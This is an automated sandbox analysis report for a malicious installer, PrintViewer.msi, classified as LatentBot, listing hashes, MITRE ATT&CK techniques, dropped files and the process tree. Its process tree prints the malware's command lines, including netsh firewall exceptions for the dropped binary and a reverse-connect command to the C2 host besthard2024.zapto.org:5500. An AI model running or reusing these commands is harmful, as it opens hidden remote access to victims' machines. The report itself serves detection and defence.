latentbot | 00ceea629efd7eb1d9eee5706ce8089336259c099fc4af274baf857bd1ddf230

Analysis

max time kernel
145s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30-09-2024 05:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PrintViewer.msi
Size

6.7MB
MD5

85f914ec316e8d20e8e13ef3719e04e4
SHA1

86ec276d409525bd8c1ef6d47ec8eece7639c0a2
SHA256

00ceea629efd7eb1d9eee5706ce8089336259c099fc4af274baf857bd1ddf230
SHA512

6a9eebfd6b4e794ab1fd949fa2093559460390a1d7843484e2086145e2ae968d8c347a3b3392aab2ebc41463cf97a3d36b23b6e8f80000949bb66c8eff3ba4e6
SSDEEP

98304:57vB+ZHiEZJMuI9JqwLOO+lzsnMHDqqxLSd7qqXR2EkLus6elw5Xe21NtcP33h3u:5IiiJiTqwLOTsMHDHBAI8kcXvWP1u

Score

10^/10

latentbot discovery evasion persistence privilege_escalation trojan

Malware Config

Extracted

Family

latentbot

besthard2024.zapto.org

Signatures

LatentBot
Modular trojan written in Delphi which has been in-the-wild since 2013.
trojan latentbot

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	5084	msiexec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2756	netsh.exe
432	netsh.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIC6CC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC6FC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{47512254-C195-428F-AD42-A0F24652B3FD}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC7AA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC913.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC534.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC68D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC73C.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\e57c488.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57c488.msi	msiexec.exe

Executes dropped EXE 4 IoCs

pid	Process
3000	MSIC913.tmp
4596	PrintDrivers.exe
4616	PrintDriver.exe
2692	PrintDrivers.exe

Loads dropped DLL 5 IoCs

pid	Process
2388	MsiExec.exe
2388	MsiExec.exe
2388	MsiExec.exe
2388	MsiExec.exe
2388	MsiExec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
5084	msiexec.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIC913.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrintDrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrintDrivers.exe

Delays execution with timeout.exe 10 IoCs

evasion

pid	Process
3264	timeout.exe
4868	timeout.exe
3512	timeout.exe
4216	timeout.exe
372	timeout.exe
2024	timeout.exe
1616	timeout.exe
3924	timeout.exe
1984	timeout.exe
4124	timeout.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Kills process with taskkill 3 IoCs

evasion

pid	Process
1536	taskkill.exe
4932	taskkill.exe
2644	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
624	msiexec.exe
624	msiexec.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe
4596	PrintDrivers.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5084	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5084	msiexec.exe
Token: SeSecurityPrivilege	624	msiexec.exe
Token: SeCreateTokenPrivilege	5084	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5084	msiexec.exe
Token: SeLockMemoryPrivilege	5084	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5084	msiexec.exe
Token: SeMachineAccountPrivilege	5084	msiexec.exe
Token: SeTcbPrivilege	5084	msiexec.exe
Token: SeSecurityPrivilege	5084	msiexec.exe
Token: SeTakeOwnershipPrivilege	5084	msiexec.exe
Token: SeLoadDriverPrivilege	5084	msiexec.exe
Token: SeSystemProfilePrivilege	5084	msiexec.exe
Token: SeSystemtimePrivilege	5084	msiexec.exe
Token: SeProfSingleProcessPrivilege	5084	msiexec.exe
Token: SeIncBasePriorityPrivilege	5084	msiexec.exe
Token: SeCreatePagefilePrivilege	5084	msiexec.exe
Token: SeCreatePermanentPrivilege	5084	msiexec.exe
Token: SeBackupPrivilege	5084	msiexec.exe
Token: SeRestorePrivilege	5084	msiexec.exe
Token: SeShutdownPrivilege	5084	msiexec.exe
Token: SeDebugPrivilege	5084	msiexec.exe
Token: SeAuditPrivilege	5084	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5084	msiexec.exe
Token: SeChangeNotifyPrivilege	5084	msiexec.exe
Token: SeRemoteShutdownPrivilege	5084	msiexec.exe
Token: SeUndockPrivilege	5084	msiexec.exe
Token: SeSyncAgentPrivilege	5084	msiexec.exe
Token: SeEnableDelegationPrivilege	5084	msiexec.exe
Token: SeManageVolumePrivilege	5084	msiexec.exe
Token: SeImpersonatePrivilege	5084	msiexec.exe
Token: SeCreateGlobalPrivilege	5084	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4512	WMIC.exe
Token: SeSecurityPrivilege	4512	WMIC.exe
Token: SeTakeOwnershipPrivilege	4512	WMIC.exe
Token: SeLoadDriverPrivilege	4512	WMIC.exe
Token: SeSystemProfilePrivilege	4512	WMIC.exe
Token: SeSystemtimePrivilege	4512	WMIC.exe
Token: SeProfSingleProcessPrivilege	4512	WMIC.exe
Token: SeIncBasePriorityPrivilege	4512	WMIC.exe
Token: SeCreatePagefilePrivilege	4512	WMIC.exe
Token: SeBackupPrivilege	4512	WMIC.exe
Token: SeRestorePrivilege	4512	WMIC.exe
Token: SeShutdownPrivilege	4512	WMIC.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
5084	msiexec.exe
5084	msiexec.exe
4616	PrintDriver.exe
4616	PrintDriver.exe
4616	PrintDriver.exe
4616	PrintDriver.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4616	PrintDriver.exe
4616	PrintDriver.exe
4616	PrintDriver.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 624 wrote to memory of 2388	624	msiexec.exe	84
PID 624 wrote to memory of 2388	624	msiexec.exe	84
PID 624 wrote to memory of 2388	624	msiexec.exe	84
PID 624 wrote to memory of 3000	624	msiexec.exe	85
PID 624 wrote to memory of 3000	624	msiexec.exe	85
PID 624 wrote to memory of 3000	624	msiexec.exe	85
PID 3012 wrote to memory of 3496	3012	cmd.exe	89
PID 3012 wrote to memory of 3496	3012	cmd.exe	89
PID 3012 wrote to memory of 2728	3012	cmd.exe	90
PID 3012 wrote to memory of 2728	3012	cmd.exe	90
PID 3012 wrote to memory of 3908	3012	cmd.exe	91
PID 3012 wrote to memory of 3908	3012	cmd.exe	91
PID 3908 wrote to memory of 4852	3908	cmd.exe	92
PID 3908 wrote to memory of 4852	3908	cmd.exe	92
PID 3012 wrote to memory of 4512	3012	cmd.exe	93
PID 3012 wrote to memory of 4512	3012	cmd.exe	93
PID 3012 wrote to memory of 4524	3012	cmd.exe	94
PID 3012 wrote to memory of 4524	3012	cmd.exe	94
PID 3012 wrote to memory of 4588	3012	cmd.exe	99
PID 3012 wrote to memory of 4588	3012	cmd.exe	99
PID 3012 wrote to memory of 4528	3012	cmd.exe	100
PID 3012 wrote to memory of 4528	3012	cmd.exe	100
PID 4528 wrote to memory of 2044	4528	cmd.exe	101
PID 4528 wrote to memory of 2044	4528	cmd.exe	101
PID 4528 wrote to memory of 2756	4528	cmd.exe	102
PID 4528 wrote to memory of 2756	4528	cmd.exe	102
PID 4528 wrote to memory of 432	4528	cmd.exe	103
PID 4528 wrote to memory of 432	4528	cmd.exe	103
PID 4528 wrote to memory of 4136	4528	cmd.exe	104
PID 4528 wrote to memory of 4136	4528	cmd.exe	104
PID 4528 wrote to memory of 1892	4528	cmd.exe	105
PID 4528 wrote to memory of 1892	4528	cmd.exe	105
PID 4528 wrote to memory of 4616	4528	cmd.exe	106
PID 4528 wrote to memory of 4616	4528	cmd.exe	106
PID 3012 wrote to memory of 372	3012	cmd.exe	107
PID 3012 wrote to memory of 372	3012	cmd.exe	107
PID 3012 wrote to memory of 1536	3012	cmd.exe	108
PID 3012 wrote to memory of 1536	3012	cmd.exe	108
PID 3012 wrote to memory of 3264	3012	cmd.exe	109
PID 3012 wrote to memory of 3264	3012	cmd.exe	109
PID 3012 wrote to memory of 4932	3012	cmd.exe	110
PID 3012 wrote to memory of 4932	3012	cmd.exe	110
PID 3012 wrote to memory of 2024	3012	cmd.exe	112
PID 3012 wrote to memory of 2024	3012	cmd.exe	112
PID 3012 wrote to memory of 2644	3012	cmd.exe	113
PID 3012 wrote to memory of 2644	3012	cmd.exe	113
PID 3012 wrote to memory of 2692	3012	cmd.exe	114
PID 3012 wrote to memory of 2692	3012	cmd.exe	114
PID 3012 wrote to memory of 2692	3012	cmd.exe	114
PID 3316 wrote to memory of 704	3316	cmd.exe	117
PID 3316 wrote to memory of 704	3316	cmd.exe	117
PID 3316 wrote to memory of 3708	3316	cmd.exe	118
PID 3316 wrote to memory of 3708	3316	cmd.exe	118
PID 3316 wrote to memory of 4412	3316	cmd.exe	119
PID 3316 wrote to memory of 4412	3316	cmd.exe	119
PID 4412 wrote to memory of 2936	4412	cmd.exe	120
PID 4412 wrote to memory of 2936	4412	cmd.exe	120
PID 3316 wrote to memory of 4868	3316	cmd.exe	121
PID 3316 wrote to memory of 4868	3316	cmd.exe	121
PID 3316 wrote to memory of 3512	3316	cmd.exe	125
PID 3316 wrote to memory of 3512	3316	cmd.exe	125
PID 3316 wrote to memory of 4216	3316	cmd.exe	127
PID 3316 wrote to memory of 4216	3316	cmd.exe	127
PID 3316 wrote to memory of 1616	3316	cmd.exe	128

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\PrintViewer.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5084

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 644A1A84F9AC86A27DBE11B25EDC000A
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2388
- C:\Windows\Installer\MSIC913.tmp
  "C:\Windows\Installer\MSIC913.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3000

C:\Games\PrintDrivers.exe
"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Windows\system32\mode.com
  Mode 90,20
  2⤵
  PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
  2⤵
  PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3908
- - C:\Windows\system32\reg.exe
    Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    3⤵
    PID:4852
- C:\Windows\System32\Wbem\WMIC.exe
  wmic process where (name="PrintDriver.exe") get commandline
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4512
- C:\Windows\system32\findstr.exe
  findstr /i "PrintDriver.exe"
  2⤵
  PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
  2⤵
  PID:4588
- C:\Windows\system32\cmd.exe
  cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4528
- - C:\Windows\system32\mode.com
    Mode 90,20
    3⤵
    PID:2044
- - C:\Windows\system32\netsh.exe
    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2756
- - C:\Windows\system32\netsh.exe
    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where (name="PrintDriver.exe") get commandline
    3⤵
    PID:4136
- - C:\Windows\system32\findstr.exe
    findstr /i "PrintDriver.exe"
    3⤵
    PID:1892
- - C:\Games\PrintDriver.exe
    C:\Games\PrintDriver.exe -autoreconnect ID:5654907 -connect besthard2024.zapto.org:5500 -run
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:372
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:1536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3264
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:4932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2024
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:2644
- C:\Games\PrintDrivers.exe
  C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3316
- C:\Windows\system32\mode.com
  Mode 90,20
  2⤵
  PID:704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
  2⤵
  PID:3708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4412
- - C:\Windows\system32\reg.exe
    Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    3⤵
    PID:2936
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:4868
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:3512
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:4216
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:1616
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:3924
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:1984
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:4124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Installer Packages

T1546.016

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Installer Packages

T1546.016

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57c48b.rbs

Filesize
418KB

MD5
8ddcd317dcf16edfc8849878857c9519

SHA1
a1ad8eed2e4bf4965d5acd361acc0feedede67c1

SHA256
991544d23e017d28a1620f4f9031912d2b14520eaa52da9d9a23a841b7b52213

SHA512
a593453f668c02b4686ae0c4100192631930a0b559f9d6279d435ba616032e163680364c8fe29094c8de5fb77cde9989b74953b546579e03ae78baedc4fe40cf

Download Submit
C:\Games\PrintDriver.exe

Filesize
2.8MB

MD5
27c1c264c6fce4a5f44419f1783db8e0

SHA1
e071486e4dfef3a13f958a252d7000d3ce7bfd89

SHA256
29379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db

SHA512
a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98

Download Submit
C:\Games\PrintDriver.txt

Filesize
1KB

MD5
6eb13f7936a83f4c44842029914aad6e

SHA1
7b9b27731d4ca6f996ce68c5d68b4d653e31d915

SHA256
8d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49

SHA512
227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e

Download Submit
C:\Games\PrintDrivers.cmd

Filesize
1KB

MD5
eacc690f71a77685f030bef23b506b91

SHA1
03b911ba997d44028bf515ea44fe4813b4b4a785

SHA256
0f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263

SHA512
9870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d

Download Submit
C:\Games\PrintDrivers.exe

Filesize
403KB

MD5
29ed7d64ce8003c0139cccb04d9af7f0

SHA1
8172071a639681934d3dc77189eb88a04c8bcfac

SHA256
e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f

SHA512
4bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415

Download Submit
C:\Games\UltraVNC.ini

Filesize
1KB

MD5
b9dfbea744cc6c65473a97f2b959e44c

SHA1
c022f1d97fa56d61ad935aafa4e9e59e611e746a

SHA256
6f95a4eff9b0c2eaf37104b323d2b09c037aa7c3d472a1887c0f7914aa6c835d

SHA512
b92c8ea3583eb87f365b96cd45562cac2c4343e281c5090fc00db3f03bb5538a2d8aea3c39449d8d79cad31ed3692f6045266811d50fdd69807d8b12a9649eb5

Download Submit
C:\Games\driverhelp.cmd

Filesize
870B

MD5
fd3b5847ddb8a31413951c0aa870ab95

SHA1
e3e91e3e9fa442cd1937422120de91da87973ddb

SHA256
e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad

SHA512
5d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096

Download Submit
C:\Windows\Installer\MSIC534.tmp

Filesize
936KB

MD5
13056f6fc48a93c1268d690e554f4571

SHA1
b83de3638e8551a315bb51703762a9820a7e0688

SHA256
aeda49baf2d79da2f7a9266f1fb7884111c2620e187090321f5278af5131c996

SHA512
ca828b4248e399178a8614f941332d159a30bad0156df0d5f4c4ca9d74d0ccb61fac59f34c945f5f914e22ec639bd97718f76d21b452825b07fe4041d1a44824

Download Submit
C:\Windows\Installer\MSIC913.tmp

Filesize
413KB

MD5
c8311ded7db427ce2c2879558ce8a8c1

SHA1
1895ce48297025dc005ebebc8256ac6d62013dec

SHA256
6fc76509f00c8ac81b597feeab520e684d190d831d828ca318d1e54afbf4a193

SHA512
d293885ef98f4e3fd9794500b8d560354cec3227916df05027f8c311076c60f11b6857e4e0ab0618f4d42da8141b42bcfb829a3a43b29a73ce0aa9967a80a232

Download Submit